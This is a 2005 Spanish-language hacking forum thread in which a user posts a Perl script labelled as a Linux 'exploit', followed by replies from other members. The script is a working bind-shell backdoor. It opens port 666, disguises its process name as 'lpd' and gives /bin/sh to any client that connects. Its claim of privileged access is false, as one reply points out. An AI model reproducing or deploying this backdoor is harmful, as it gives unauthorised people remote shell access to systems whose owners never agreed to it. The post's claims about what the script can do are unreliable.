elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 21:15  


Tema destacado: Grupo de Facebook de elhacker.net

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Linux/Unix (Moderadores: kamsky, TRICKY, berz3k)
| | | |-+  Remote Linux Access
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Remote Linux Access  (Leído 3,056 veces)
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Remote Linux Access
« en: 8 Diciembre 2005, 18:55 »

El siguiente exploit, abre un puerto arbitrario e ingresa en el sistema con permisos privilegiados, permitiendo a un atacante hacerse con el control de una maquina linux


Exploit:
Código:
#!/usr/bin/perl

#Y! Underground Group
#code by:Y4Ho
#We Are :Y4Ho0-Iranvertex-MrPorT-S.s-LordSatan-SirSisili
#Email:info@emperorteam.com
#Email:y4ho0_emperor@yahoo.com
#Homepage:www.emperorteam.com
#tnxto:C0llect0r-Sasan-Shabgard-simorgh.Ev-IHS
#Ex: ./Y!.pl

use Socket;

$port = 666;
$proto = getprotobyname('tcp');
$cmd = "lpd";
$system = '/bin/sh';

$0 = $cmd;

socket(SERVER, PF_INET, SOCK_STREAM, $proto)
                                        or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
                                        or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY))
                                        or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";

for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
{
        open(STDIN, ">&CLIENT");
        open(STDOUT, ">&CLIENT");
        open(STDERR, ">&CLIENT");

        system($system);

        close(STDIN);
        close(STDOUT);
        close(STDERR);
}

#EoF

Fuente:securiteam

Salu2 Boys



En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
heap

Desconectado Desconectado

Mensajes: 272



Ver Perfil WWW
Re: Remote Linux Access
« Respuesta #1 en: 8 Diciembre 2005, 19:25 »

Y donde esta el exploit ???
YO lo unico que veo es un servidor que escuha en el puerto 666 y duplica stdin stdout y stderr cuando uno se conecta y luego ejecuta /bin/sh ....... nada de especial, hay 10000 codigos asi, y este es le mas sencillo que he visto........andale buscate algo mejor...


En línea

Ivanchuk


Desconectado Desconectado

Mensajes: 466


LLVM


Ver Perfil WWW
Re: Remote Linux Access
« Respuesta #2 en: 8 Diciembre 2005, 21:59 »

WTF???, que pusiste?. Eso no es un exploit. Es más deberia estar en el foro de programación, asi le sirve al que no sabe como bindear una shell en perl.
En línea

Sólo quien practica lo absurdo puede lograr lo imposible.

Join us @ http://foro.h-sec.org
icisneros
GNU/Linux
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.296



Ver Perfil WWW
Re: Remote Linux Access
« Respuesta #3 en: 14 Diciembre 2005, 18:26 »

mousehack al contrario de los compañeros de arriba, yo te agradezco que postees esto aquí y hago una nueva pregunta:

No se programar en perl, pero si en otros lenguajes y por lo que he leido del codigo este programa ejecutado te devolvera una shell pero con los mismos permisos del usuario que ejecuta la shell si es un simple usuario no tendras permismos privilegiados, y ademas esto saltara un iptables "configurado" ?

Saludos!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Remote SAM access
Hacking Avanzado
darkhansolo 3 1,251 Último mensaje 17 Abril 2011, 12:05
por zerocoolcom
Dudas con Routing and Remote Access y redes VPN
Redes
multiplayer1080 4 995 Último mensaje 13 Octubre 2011, 01:24
por multiplayer1080
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines